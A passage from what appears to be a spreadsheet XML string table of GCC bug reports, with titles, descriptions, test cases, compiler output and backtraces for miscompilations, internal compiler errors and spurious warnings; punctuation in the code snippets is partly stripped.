When I tried to run the java class it gave an error when it called the native function.
I examined some other dll's used by java (with depens.exe) and all the functions 
had a '_' prepended.
I changed the line in the header file to:
  extern JNIEXPORT void JNICALL _Java_JavaSide_sayHello (JNIEnv *env jobject)
Recompiled the C++ source and ran the java class. This time the function worked 
without any problems.</t>
  </si>
  <si>
    <t>bcmpinc</t>
  </si>
  <si>
    <t>GCC-63302</t>
  </si>
  <si>
    <t>[4.9 Regression] Code with 64-bit long long constants is miscompiled on 32-bit host</t>
  </si>
  <si>
    <t>The following function from pa.c is miscompiled when generating a hppa64
cross compiler:
dave@mx3210:~/hardware/ldil$ cat ldil.c
#define HOST_WIDE_INT long long
int
pa_ldil_cint_p (HOST_WIDE_INT ival)
{
 HOST_WIDE_INT x = ival 
 return x == 0 || x == ((HOST_WIDE_INT) -1 &lt;&lt; 31)
}
gcc-4.9 -S -O1 ldil.c:
dave@mx3210:~/hardware/ldil$ cat ldil.s
	.LEVEL 1.1
	.text
	.align 4
.globl pa_ldil_cint_p
	.type	pa_ldil_cint_p @function
pa_ldil_cint_p:
	.PROC
	.CALLINFO FRAME=0NO_CALLS
	.ENTRY
	extru %r263111%r28
	comiclr 0%r28%r28
	ldi 1%r28
	bvn %r0(%r2)
	.EXIT
	.PROCEND
	.size	pa_ldil_cint_p .-pa_ldil_cint_p
	.ident	GCC: (Debian 4.9.1-14) 4.9.1
The high order bits are not checked in the assembly code.  We have the
following in ldil.c.170r.expand:
pa_ldil_cint_p (long long int ival)
{
  int _6
  long long int _8
  _Bool _9
   basic block 2 loop depth 0
    pred:       ENTRY
  _8 = ival_1(D) 
  _9 = _8 == 0
  _6 = (int) _9
  return _6
    succ:       EXIT
}
This breaks 64-bit kernel build.  4.8 branch is ok.</t>
  </si>
  <si>
    <t>GCC-36681</t>
  </si>
  <si>
    <t>compiler error message with gfortran 4.3.1 but not with 4.2.1</t>
  </si>
  <si>
    <t>program test
  logical(kind=1)parameter     :: t=.true.f=.false.
  logical(kind=1)dimension(9)  :: hexahexb
  data hexa/ffttffftf/hexb/ftfffttff/
  isum=count(hexa(1:9).eqv.hexb(1:9))
  print* isum
end program   
with gfortran from gcc 4.3.1 above code produces:
test.f90:10.11:
end program
          1
Internal Error at (1):
test.f90:6.30:
     isum=count(hexa(1:9).eqv.hexb(1:9))
                             1
Can't convert LOGICAL(1) to LOGICAL(1) at (1)
but no error with gfortran 4.2.1</t>
  </si>
  <si>
    <t>hatz</t>
  </si>
  <si>
    <t>GCC-16620</t>
  </si>
  <si>
    <t>[meta-bug] C90 conformance bugs</t>
  </si>
  <si>
    <t>There are several conformance bugs in the implementation of C90.
This bug is to track them through dependencies.</t>
  </si>
  <si>
    <t>GCC-24834</t>
  </si>
  <si>
    <t>PersistentByteMap close() method is not catching Exception</t>
  </si>
  <si>
    <t>the close() method from java.nio.channels.FileChannel (through java.nio.channels.spi.AbstractInterruptibleChannel) is throwing an exception inside the close() method in gnu.gcj.runtime.PersistentByteMap.
This can be resolved in two ways:
1. Catch the Exception in the close() method and just drop the Exception. (since it's a close that fails it shouldn't cause too much trouble).
2. Let the close() method throw it further up in the hirearchy. (formally right but is it needed?)</t>
  </si>
  <si>
    <t>m4341</t>
  </si>
  <si>
    <t>GCC-29459</t>
  </si>
  <si>
    <t>Spurious warnings about anonymous variables</t>
  </si>
  <si>
    <t>gfortran -c -Wall -O1 gfort_warnings.f90 
using gcc version 4.2.0 20061011 (experimental) on Windows XP
for the code
module foo_mod
implicit none
contains
subroutine print_sub(fmt_acfiulabels)
character (len=*) intent(in) optional :: fmt_acf
integer           intent(in) optional :: iu
character (len=*) intent(in) optional :: labels(:)
if (present(iu)) then
   print*iu
end if
if (present(fmt_acf)) then
   print*fmt_acf
end if
if (present(labels)) then
   write (**) labels
end if
end subroutine print_sub
!
end module foo_mod
produces the spurious warnings
gfort_warnings.f90: In function 'print_sub':
gfort_warnings.f90:4: warning: 'stride.1' may be used uninitialized in this function
gfort_warnings.f90:4: warning: 'ubound.0' may be used uninitialized in this function
gfort_warnings.f90:4: warning: 'labels.0' may be used uninitialized in this function
gfort_warnings.f90:4: warning: '' may be used uninitialized in this function</t>
  </si>
  <si>
    <t>GCC-48560</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] -Warray-bounds fails to detect the out of bound array access</t>
  </si>
  <si>
    <t>[hjl@gnu-6 bfd]$ cat b.c
char
foo1 (int i)
{
  static char s[] = foo
  switch (i)
  {
  case 30:
    return s[30]
  }
  return s[i]
}
[hjl@gnu-6 bfd]$ /usr/gcc-4.5/bin/gcc  -O3 -S -Wall b.c
b.c: In function â€˜foo1â€™:
b.c:8:13: warning: array subscript is above array bounds
[hjl@gnu-6 bfd]$ /usr/gcc-4.6/bin/gcc  -O3 -S -Wall b.c
[hjl@gnu-6 bfd]$</t>
  </si>
  <si>
    <t>GCC-1335</t>
  </si>
  <si>
    <t>illegal type long accepted for switch expression</t>
  </si>
  <si>
    <t xml:space="preserve">Responsible-Changed-From-To: apbianco-&gt;tromey
Responsible-Changed-Why: I submitted a patch.
</t>
  </si>
  <si>
    <t>GCC-51583</t>
  </si>
  <si>
    <t>One more missing force_gimple_operand in SRA</t>
  </si>
  <si>
    <t>Created attachment 26113
Testcase
I noticed that part of my fix to PR 50622 somehow got lost which can
lead to ICEs in some obscure cases for example when compiling the
attached testcase.  It fails on i686 and x86_64 on both the trunk and
the 4.6 branch with:
test.c: In function â€˜fooâ€™:
test.c:34:1: error: invalid rhs for gimple memory store
s$u$v
t.u.v
# .MEM_20 = VDEF 
s$u$v = t.u.v
test.c:34:1: internal compiler error: verify_stmts failed
I am about to bootstrap and test a fix.</t>
  </si>
  <si>
    <t>GCC-16225</t>
  </si>
  <si>
    <t>[4.0 regression] ICE: verify_ssa failed.</t>
  </si>
  <si>
    <t>[forwarded from http://bugs.debian.org/256452]
HEAD 20040626 ok with 3.3.4 and 3.4.1.
gcc -O bitcnt_4.i
bitcnt_4.c: In function `btbl_bitcnt':
bitcnt_4.c:54: error: PHI argument duplicated for edge 1-&gt;0
PHI argument
x_20
for PHI node
x_9 = PHI _22(-1) x.146_16(1) x_20(1)&gt;
bitcnt_4.c:54: internal compiler error: verify_ssa failed.
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-50951</t>
  </si>
  <si>
    <t>state of subtract_with_carry_engine not saved correctly to output stream</t>
  </si>
  <si>
    <t>the value of __x._M_p is not written to output stream __os by
operator&amp; __osconst subtract_with_carry_engine&amp; __x) 
in 4.6.1/include/c++/bits/random.tcc.
Consequently the state of the random engine is not fully restored by the corresponding operator&gt;&gt;.
One way to fix the problem is to write __x._M_p to output stream __os.
Alternatively the contents of the ring buffer could be saved and restored always beginning at index __x._M_p whatever its value and then wrapping around the ring buffer as necessary.</t>
  </si>
  <si>
    <t>dariomelu</t>
  </si>
  <si>
    <t>GCC-15900</t>
  </si>
  <si>
    <t>template friend member function declaration has no effect</t>
  </si>
  <si>
    <t>compiling:
------------------------------------------------------------------------
template struct A 
{
  void foo()
}
class B
{
  template friend void A::foo()
  static int _b
}
int B::_b = 0
template void A::foo() { ++B::_b }
int main()
{
  A a
  a.foo()
}
-------------------------------------------------------------------
results in:
trudolf-l4:~/c&gt; g++ -c friend.cc
friend.cc: In member function `void A::foo() [with T = int]':
friend.cc:19:   instantiated from here
friend.cc:12: `int B::_b' is private
friend.cc:14: within this context
trudolf-l4:~/c&gt; g++ -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/3.2/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man
--infodir=/usr/share/info --enable-shared --enable-threads=posix
--disable-checking --host=i386-redhat-linux --with-system-zlib --enable-__cxa_atexit
Thread model: posix
gcc version 3.2 20020903 (Red Hat Linux 8.0 3.2-7)
trudolf-l4:~/c&gt;</t>
  </si>
  <si>
    <t>thomas.rudlof</t>
  </si>
  <si>
    <t>GCC-45733</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: verify_stmts failed: invalid conversion in gimple call with -fstrict-overflow -ftree-vectorize</t>
  </si>
  <si>
    <t>Compiler output:
$ gcc -O1 -fstrict-overflow -ftree-vectorize testcase.c
testcase.c: In function 'foo':
testcase.c:4:1: error: invalid conversion in gimple call
vector(2) void *
vector(2) long long unsigned int
vect_var_.19_89 = __builtin_ia32_vec_perm_v2di_u (vect_var_.18_88 vect_var_.18_88 { 1B 0B })
testcase.c:4:1: internal compiler error: verify_stmts failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r164378 - crash
r164287 - OK</t>
  </si>
  <si>
    <t>GCC-25304</t>
  </si>
  <si>
    <t>[DR 865] std::fill_n std::generate_n incorrect signature</t>
  </si>
  <si>
    <t>Both template functions are required to return void.
$ cat u.cpp &amp;&amp; g++ -c u.cpp
#include 
template void std::fill_n (int* int const int
template void std::generate_n (int* int int (*)())
int main () { }
u.cpp:3: error: template-id 'fill_n' for 'void std::fill_n(int* int const int&amp;)' does not match any template declaration
u.cpp:4: error: template-id 'generate_n' for 'void std::generate_n(int* int int (*)())' does not match any template declaration</t>
  </si>
  <si>
    <t>GCC-82792</t>
  </si>
  <si>
    <t>Fallthrough attribute ignored after label and before with address sanitizer</t>
  </si>
  <si>
    <t>Created attachment 42508
Test case
I have a test case a simplified version of our actual code where the fallthrough attribute is ignored when a label immediately precedes the default case label and a fallthrough warning is triggered.  Please see attached test case and output.  Simple work-arounds welcome too.</t>
  </si>
  <si>
    <t>michael.thayer</t>
  </si>
  <si>
    <t>GCC-733</t>
  </si>
  <si>
    <t>g++ bug report - i386-redhat-linux</t>
  </si>
  <si>
    <t>Didn't investigate much but as it seems my file includes both  and  which causes some invalid redeclarations to occur. But is it the reason for this ice ???
If you need more details don't hesitate to contact me back. Good luck and thank you very much !
Compilation command : 
g++ -Wall -Werror -DLINUX -c axis_controld.C -o axis_controld.o
Corresponding output :
In file included from axis_controld.C:8:
/usr/include/asm/io.h: In function `unsigned char inb (short unsigned 
int)':
/usr/include/asm/io.h:83: redefinition of `unsigned char inb (short 
unsigned int)'
/usr/include/sys/io.h:45: `unsigned char inb (short unsigned int)' 
previously defined here
/usr/include/asm/io.h: In function `unsigned char inb (short unsigned 
int)':
/usr/include/asm/io.h:83: Internal error #19990919.
/usr/include/asm/io.h:83: Internal compiler error in setup_vtbl_ptr at 
../gcc/cp/semantics.c:1203
Please submit a full bug report.
See  for instructions.
make: *** [axis_controld.o] Error 1
Information-collection command :
g++ -v -save-temps -Wall -Werror -DLINUX axis_controld.C
Corresponding output (+ attached file axis_control.ii.bz2) :
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (Red Hat Linux 7.0)
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/cpp0 -lang-c++ -D__GNUG__=2 -v -D__GNUC
__=2 -D__GNUC_MINOR__=96 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__EL
F__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem(posix) -Wall -Werror -Acp
u(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -D__tune_i386__ -DLINUX axis_
controld.C axis_controld.ii
GNU CPP version 2.96 20000731 (Red Hat Linux 7.0) (cpplib)
 (i386 Linux/ELF)
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory /usr/i386-redhat-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/include/g++-3
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/cc1plus axis_controld.ii -quiet -dumpba
se axis_controld.C -Wall -Werror -version -o axis_controld.s
GNU C++ version 2.96 20000731 (Red Hat Linux 7.0) (i386-redhat-linux) compiled b
y GNU C version 2.96 20000731 (Red Hat Linux 7.0).
In file included from axis_controld.C:8:
/usr/include/asm/io.h: In function `unsigned char inb (short unsigned 
int)':
/usr/include/asm/io.h:83: redefinition of `unsigned char inb (short 
unsigned int)'
/usr/include/sys/io.h:45: `unsigned char inb (short unsigned int)' 
previously defined here
/usr/include/asm/io.h: In function `unsigned char inb (short unsigned 
int)':
/usr/include/asm/io.h:83: Internal error #19990919.
/usr/include/asm/io.h:83: Internal compiler error in setup_vtbl_ptr at 
../gcc/cp/semantics.c:1203
Please submit a full bug report.
See  for instructions.
Release:
gcc version 2.96 20000731 (Red Hat Linux 7.0)
Environment:
i386-redhat-linux</t>
  </si>
  <si>
    <t>wieleman</t>
  </si>
  <si>
    <t>GCC-29470</t>
  </si>
  <si>
    <t>[4.2/4.3/4.4 Regression] Using declaration access semantics change with templates</t>
  </si>
  <si>
    <t>In the following class template the protected using declaration causes the inherited member to become publicly accessible.  The code compiles even though it shouldn't.
template  struct B
{
	protected:
	T v
}
template  struct D : B
{
	protected:
	using B::v
}
int main()
{
	D d
	d.v = 0
	return 0
}
$ g++ test.cpp
The same code without templates gives the correct behaviour and doesn't compile.
struct B
{
	protected:
	int v
}
struct D : B
{
	protected:
	using B::v
}
int main()
{
	D d
	d.v = 0
	return 0
}
$ g++ test.cpp
test.cpp: In function 'int main()':
test.cpp:4: error: 'int B::v' is protected
test.cpp:14: error: within this context
The preprocessed file from the template version is as follows:
# 1 test.cpp
# 1 
# 1 
# 1 test.cpp
template  struct B
{
 protected:
 T v
}
template  struct D : B
{
 protected:
 using B::v
}
int main()
{
 D d
 d.v = 0
 return 0
}</t>
  </si>
  <si>
    <t>GCC-21304</t>
  </si>
  <si>
    <t>[4.0 regression] very long compile times with large cpp file from kdebindings</t>
  </si>
  <si>
    <t>compiling kdebindings hangs after a while.
the attached testcase (680k) takes a very long time to compile.
abuild@tangelo:~&gt; /usr/bin/time ./install_gcc41-1-O1/libexec/gcc/powerpc-unknown-linux-gnu/4.1.0/cc1plus -fpreprocessed /tmp/sipqtpart0.ii -quiet -dumpbase sipqtpart0.cpp -auxbase-strip sipqtpart0.o -O2 -O2 -Wall -Wall -Wall -W -version -fmessage-length=0 -fPIC -fmessage-length=0 -o sipqtpart0.s -O2 -v
ignoring nonexistent directory /home/abuild/install_gcc41-1-O1/lib/gcc/powerpc-unknown-linux-gnu/4.1.0/../../../../powerpc-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /home/abuild/install_gcc41-1-O1/lib/gcc/powerpc-unknown-linux-gnu/4.1.0/../../../../include/c++/4.1.0
 /home/abuild/install_gcc41-1-O1/lib/gcc/powerpc-unknown-linux-gnu/4.1.0/../../../../include/c++/4.1.0/powerpc-unknown-linux-gnu
 /home/abuild/install_gcc41-1-O1/lib/gcc/powerpc-unknown-linux-gnu/4.1.0/../../../../include/c++/4.1.0/backward
 /usr/local/include
 /home/abuild/install_gcc41-1-O1/include
 /home/abuild/install_gcc41-1-O1/lib/gcc/powerpc-unknown-linux-gnu/4.1.0/include
 /usr/include
End of search list.
GNU C++ version 4.1.0 20050429 (experimental) (powerpc-unknown-linux-gnu)
        compiled by GNU C version 4.1.0 20050429 (experimental).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
/usr/lib/qt3/include/qnetworkprotocol.h:58: warning: 'class QNetworkProtocolFactoryBase' has virtual functions but non-virtual destructor
/usr/lib/qt3/include/qtooltip.h:86: warning: 'class QToolTip' has virtual functions but non-virtual destructor
/usr/lib/qt3/include/qfiledialog.h:78: warning: 'class QFilePreview' has virtual functions but non-virtual destructor
16616.21user 2.85system 4:37:01elapsed 99%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (0major+275763minor)pagefaults 0swaps
gcc 4.0 -O0  == 0:02:15 h:mm:ss
gcc 4.0 -O1  == 1:06:00
gcc 4.0 -O2  == 4:05:00
gcc 4.1 -O2  == 4:37:00 
This is on a 1.5GHz POWER5.
./install_gcc40-1-O1/bin/g++ -v
Using built-in specs.
Target: powerpc-unknown-linux-gnu
Configured with: /home/abuild/src/gcc-4_0-branch/configure --prefix=/home/abuild/install_gcc40-1-O1 --enable-threads=posix --enable-languages=cc++ --enable-checking --with-system-zlib --enable-shared --enable-__cxa_atexit --disable-nls
Thread model: posix
gcc version 4.0.1 20050429 (prerelease)
I'm trying mainline with --disable-checking at the moment.</t>
  </si>
  <si>
    <t>GCC-35642</t>
  </si>
  <si>
    <t>[4.4 Regression] short * short multiplication not vectorized on Power</t>
  </si>
  <si>
    <t>with svn version 133159 the following bugs show up in the tree vectorizer if you do not bootstrap the compiler:
FAIL: gcc.dg/vect/vect-strided-store-u16-i4.c scan-tree-dump-times vect vectorized 1 loops 2
FAIL: gcc.dg/vect/vect-vfa-03.c scan-tree-dump-times vect vectorized 1 loops 1
XPASS: gcc.dg/vect/vect-vfa-03.c scan-tree-dump-times vect vectorized 1 loops 0
FAIL: gcc.dg/vect/slp-21.c scan-tree-dump-times vect vectorized 4 loops 1
FAIL: gcc.dg/vect/slp-21.c scan-tree-dump-times vect vectorizing stmts using SLP 2
and the bugs go away when you bootstrap.   I have made modifications to register allocator and these downstream changes cause the compiler to be enough different so that the bugs become hard failures.    
however the bugs are easily reproducible by 
--enable-languages=c --with-cpu=default-32 --disable-multilib  --disable-bootstrap 
with this version of the compiler.  I have not played around with this in other revisions.  I know that this combo will reproduce the issue.  Since this is most likely a storage leak or an uninitialized variable it is important to recreate the environment exactly.
Kenny</t>
  </si>
  <si>
    <t>GCC-15963</t>
  </si>
  <si>
    <t>Error when comparing characters in restricted expression</t>
  </si>
  <si>
    <t>The following code generates a compiler error.
It happens only when a and b are of non-numerical type
and only in an initialization expression.
When array b wouldn't be used and only 
write(6*) count(a &lt; 'D') 
was used the compiler accepts it.
troogle&gt; gfortran -c -v n11.f95
Reading specs from /OPT/32/gcc-2004-06-09/lib/gcc/hppa2.0w-hp-hpux11.11/3.5.
0/specs
Configured with: ../configure --enable-languages=cf95 
--prefix=/opt32/gcc-2004-06-09 --with-gmp=/opt32/gmp --with-gnu-as 
--with-as=/opt32/binutils/bin/as --enable-threads --disable-shared --disable-nls
Thread model: posix
gcc version 3.5.0 20040611 (experimental)
 /OPT/32/gcc-2004-06-09/libexec/gcc/hppa2.0w-hp-hpux11.11/3.5.0/f951 n11.f95 
-quiet -dumpbase n11.f95 -auxbase n11 -version -o /var/tmp//ccCVK5zQ.s
GNU F95 version 3.5.0 20040611 (experimental) (hppa2.0w-hp-hpux11.11)
        compiled by GNU C version 3.5.0 20040611 (experimental).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
 In file n11.f95:8
write(6*) write(6*) size(b)
                  1
Error: Syntax error in argument list at (1)
 In file n11.f95:5
character(8)              :: b(count(a &lt; 'D'))
                                    1
Error: Numeric operands are required in expression at (1)
subroutine x(a)
implicit none
character(8) intent(in)  :: a(10)
character(8)              :: b(count(a &lt; 'D'))
write(6*) size(b)
end subroutine x</t>
  </si>
  <si>
    <t>Mart.Rentmeester</t>
  </si>
  <si>
    <t>GCC-54902</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE (segfault) building on arm-linux-gnueabi</t>
  </si>
  <si>
    <t>Created attachment 28426
preprocessed source
seen building the cone package on arm-linux-gnueabi works with 4.6 branch fails with 4.7.
g++-4.7 -c -g -O[123] myserver.ii
myserver.C: In static member function 'static bool myServer::eventloop(myServer::Callback*)':
myserver.C:168:6: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
Program received signal SIGSEGV Segmentation fault.
0x003b90ae in free_scc_vn() ()
(gdb) bt
#0 0x003b90ae in free_scc_vn() ()
#1 0x003aee44 in ?? ()
#2 0x003aee44 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)</t>
  </si>
  <si>
    <t>GCC-66994</t>
  </si>
  <si>
    <t>[6 Regression] ICE: Segmentation fault during bootstrap-O3</t>
  </si>
  <si>
    <t>Seen on ppc64le during stageprofile build of libstdc++-v3:
libtool: compile:  /home/trippels/gcc_build_dir__/./gcc/xgcc -shared-libgcc -B/home/trippels/gcc_build_dir__/./gcc -nostdinc++ -L/home/trippels/gcc_build_dir__/powerpc64le-unknown-linux-gnu/libstdc++-v3/src -L/home/trippels/gcc_build_dir__/powerpc64le-unknown-linux-gnu/libstdc++-v3/src/.libs -L/home/trippels/gcc_build_dir__/powerpc64le-unknown-linux-gnu/libstdc++-v3/libsupc++/.libs -B/usr/local/powerpc64le-unknown-linux-gnu/bin/ -B/usr/local/powerpc64le-unknown-linux-gnu/lib/ -isystem /usr/local/powerpc64le-unknown-linux-gnu/include -isystem /usr/local/powerpc64le-unknown-linux-gnu/sys-include -I/home/trippels/gcc/libstdc++-v3/../libgcc -I/home/trippels/gcc_build_dir__/powerpc64le-unknown-linux-gnu/libstdc++-v3/include/powerpc64le-unknown-linux-gnu -I/home/trippels/gcc_build_dir__/powerpc64le-unknown-linux-gnu/libstdc++-v3/include -I/home/trippels/gcc/libstdc++-v3/libsupc++ -D_GLIBCXX_SHARED -fno-implicit-templates -Wall -Wextra -Wwrite-strings -Wcast-qual -Wabi -fdiagnostics-show-location=once -ffunction-sections -fdata-sections -frandom-seed=eh_call.lo -g -O2 -D_GNU_SOURCE -c ../../../../gcc/libstdc++-v3/libsupc++/eh_call.cc  -fPIC -DPIC -D_GLIBCXX_SHARED -o eh_call.o
In file included from /usr/include/stdlib.h:42:0
                 from /home/trippels/gcc_build_dir__/powerpc64le-unknown-linux-gnu/libstdc++-v3/include/cstdlib:72
                 from ../../../../gcc/libstdc++-v3/libsupc++/eh_call.cc:26:
/usr/include/bits/waitstatus.h:73:28: internal compiler error: Segmentation fault
  unsigned int __w_coredump:1 /* Set if dumped core.  */
                            ^
0x1106c737 crash_signal
        ../../gcc/gcc/toplev.c:352
0x103483d4 make_id_declarator
        ../../gcc/gcc/cp/parser.c:1420
0x1036bfd7 cp_parser_member_declaration
        ../../gcc/gcc/cp/parser.c:21003
0x1036d09b cp_parser_member_specification_opt
        ../../gcc/gcc/cp/parser.c:20707
0x1036d09b cp_parser_class_specifier_1
        ../../gcc/gcc/cp/parser.c:19899
0x1036d09b cp_parser_class_specifier
        ../../gcc/gcc/cp/parser.c:20135
0x1037208b cp_parser_type_specifier
        ../../gcc/gcc/cp/parser.c:14733
0x1037273b cp_parser_decl_specifier_seq
        ../../gcc/gcc/cp/parser.c:11969
0x1036b907 cp_parser_member_declaration
        ../../gcc/gcc/cp/parser.c:20852
0x1036d09b cp_parser_member_specification_opt
        ../../gcc/gcc/cp/parser.c:20707
0x1036d09b cp_parser_class_specifier_1
        ../../gcc/gcc/cp/parser.c:19899
0x1036d09b cp_parser_class_specifier
        ../../gcc/gcc/cp/parser.c:20135
0x1037208b cp_parser_type_specifier
        ../../gcc/gcc/cp/parser.c:14733
0x1037273b cp_parser_decl_specifier_seq
        ../../gcc/gcc/cp/parser.c:11969
0x10394223 cp_parser_simple_declaration
        ../../gcc/gcc/cp/parser.c:11545
0x103a040b cp_parser_block_declaration
        ../../gcc/gcc/cp/parser.c:11492
0x10351c8b cp_parser_declaration
        ../../gcc/gcc/cp/parser.c:11389
0x103acbef cp_parser_declaration_seq_opt
        ../../gcc/gcc/cp/parser.c:11275
0x103ad633 cp_parser_linkage_specification
        ../../gcc/gcc/cp/parser.c:12162
0x10351dc7 cp_parser_declaration
        ../../gcc/gcc/cp/parser.c:11333
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-4655</t>
  </si>
  <si>
    <t>ICE on small-ish test code</t>
  </si>
  <si>
    <t>Script started on Sun Oct 21 16:26:45 2001
mikec@smpc52:~/data/Xockup/cockup$ g++ -v -save-temps cockup.cpp
Reading specs from /usr/lib/gcc-lib/i386-linux/2.95.4/specs
gcc version 2.95.4 20011006 (Debian prerelease)
 /usr/lib/gcc-lib/i386-linux/2.95.4/cpp0 -lang-c++ -v -D__GNUC__=2 -D__GNUG__=2
-D__GNUC_MINOR__=95 -D__cplusplus -D__ELF__ -Dunix -D__i386__ -Dlinux -D__ELF__
-D__unix__ -D__i386__ -D__linux__ -D__unix -D__linux -Asystem(posix) -D__EXCEPTIONS -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ cockup.cpp cockup.ii
GNU CPP version 2.95.4 20011006 (Debian prerelease) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc-lib/i386-linux/2.95.4/../../../../include/g++-3
 /usr/local/include
 /usr/lib/gcc-lib/i386-linux/2.95.4/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
 /usr/lib/gcc-lib/i386-linux/2.95.4/../../../../i386-linux/include
End of omitted list.
 /usr/lib/gcc-lib/i386-linux/2.95.4/cc1plus cockup.ii -quiet -dumpbase cockup.cc -version -o cockup.s
GNU C++ version 2.95.4 20011006 (Debian prerelease) (i386-linux) compiled by GNU C version 2.95.4 20011006 (Debian prerelease).
cockup.cpp: In function `int main(int char **)':
cockup.cpp:52: Internal compiler error.
cockup.cpp:52: Please submit a full bug report.
cockup.cpp:52: Internal compiler error:
cockup.cpp:52: See  for instructions.
mikec@smpc52:~/data/Xockup/cockup$ exit
Script done on Sun Oct 21 16:26:56 2001
Release:
gcc version 2.95.4 20011006 (Debian prerelease)
Environment:
linux debian woody
Linux smpc52 2.4.9 #3 Fri Oct 19 17:08:03 CEST 2001 i686 unknown
How-To-Repeat:
g++ -v -save-temps cockup.cpp</t>
  </si>
  <si>
    <t>mikec</t>
  </si>
  <si>
    <t>GCC-67451</t>
  </si>
  <si>
    <t>[5/6 Regression] [F08] ICE with sourced allocation from coarray.</t>
  </si>
  <si>
    <t>The following when compiled with trunk r227476 results in a ICE:
  program main
    implicit none
    type foo
      integer :: bar = 99
    end type
    class(foo) allocatable :: foobar[:]
    class(foo) allocatable :: some_local_object
    allocate(foobar[*])
    allocate(some_local_object source=foobar)
  end program
The ICE is associated with the use of a coarray or coindexed object in the source expression of the allocate statement.
$ gfortran -v -fcoarray=lib 2015-09-04\ sourced-alloc.f90
Driving: gfortran -v -fcoarray=lib 2015-09-04 sourced-alloc.f90 -l gfortran -l m -shared-libgcc
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=/home/MEGMS2/ian/usr/gcc-6.0.0/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: .././src/configure --prefix=/home/MEGMS2/ian/usr/gcc-6.0.0 --enable-languages=cc++fortran --enable-libgomp --enable-checking=release
Thread model: posix
gcc version 6.0.0 20150903 (experimental) (GCC)
COLLECT_GCC_OPTIONS='-v' '-fcoarray=lib' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /home/MEGMS2/ian/usr/gcc-6.0.0/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/f951 2015-09-04 sourced-alloc.f90 -quiet -dumpbase 2015-09-04 sourced-alloc.f90 -mtune=generic -march=x86-64 -auxbase 2015-09-04 sourced-alloc -version -fcoarray=lib -fintrinsic-modules-path /home/MEGMS2/ian/usr/gcc-6.0.0/lib/gcc/x86_64-pc-linux-gnu/6.0.0/finclude -o /tmp/ccX5BIwU.s
GNU Fortran (GCC) version 6.0.0 20150903 (experimental) (x86_64-pc-linux-gnu)
        compiled by GNU C version 6.0.0 20150903 (experimental) GMP version 6.0.0 MPFR version 3.1.2 MPC version 1.0.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU Fortran2008 (GCC) version 6.0.0 20150903 (experimental) (x86_64-pc-linux-gnu)
        compiled by GNU C version 6.0.0 20150903 (experimental) GMP version 6.0.0 MPFR version 3.1.2 MPC version 1.0.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
2015-09-04 sourced-alloc.f90:9:0:
     allocate(some_local_object source=foobar)
1
internal compiler error: Segmentation fault
0xa1271f crash_signal
        ../.././src/gcc/toplev.c:352
0x690f9e gfc_class_vptr_get(tree_node*)
        ../.././src/gcc/fortran/trans-expr.c:153
0x694155 class_vtab_field_get
        ../.././src/gcc/fortran/trans-expr.c:201
0x694155 gfc_class_vtab_copy_get(tree_node*)
        ../.././src/gcc/fortran/trans-expr.c:223
0x694155 gfc_copy_class_to_class(tree_node* tree_node* tree_node* bool)
        ../.././src/gcc/fortran/trans-expr.c:1084
0x6cd11b gfc_trans_allocate(gfc_code*)
        ../.././src/gcc/fortran/trans-stmt.c:5725
0x66a7e7 trans_code
        ../.././src/gcc/fortran/trans.c:1798
0x68d6f3 gfc_generate_function_code(gfc_namespace*)
        ../.././src/gcc/fortran/trans-decl.c:5900
0x627210 translate_all_program_units
        ../.././src/gcc/fortran/parse.c:5526
0x627210 gfc_parse_file()
        ../.././src/gcc/fortran/parse.c:5731
0x667ba2 gfc_be_parse_file
        ../.././src/gcc/fortran/f95-lang.c:209
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-51489</t>
  </si>
  <si>
    <t>constexpr not working consistently</t>
  </si>
  <si>
    <t>I think this is a bug and the program should compile.
  struct array
  {
      constexpr array() :x(0) {}
      constexpr int const* begin() { return  }
      int x
  }
  constexpr array aa
  constexpr auto b = aa.begin()
  static_assert(b-b == 0 compiles just fine)
  static_assert(aa.begin()-aa.begin() == 0 compiler thinks it's not a constant expression)</t>
  </si>
  <si>
    <t>GCC-42998</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE: error: verify_stmts failed</t>
  </si>
  <si>
    <t>Building Linux kernel 2.6.33-rc7 with gcc 4.5-svn fails with an ICE:
net/ipv6/ndisc.c: In function 'ndisc_fill_addr_option':
net/ipv6/ndisc.c:199:12: error: type mismatch in pointer plus expression
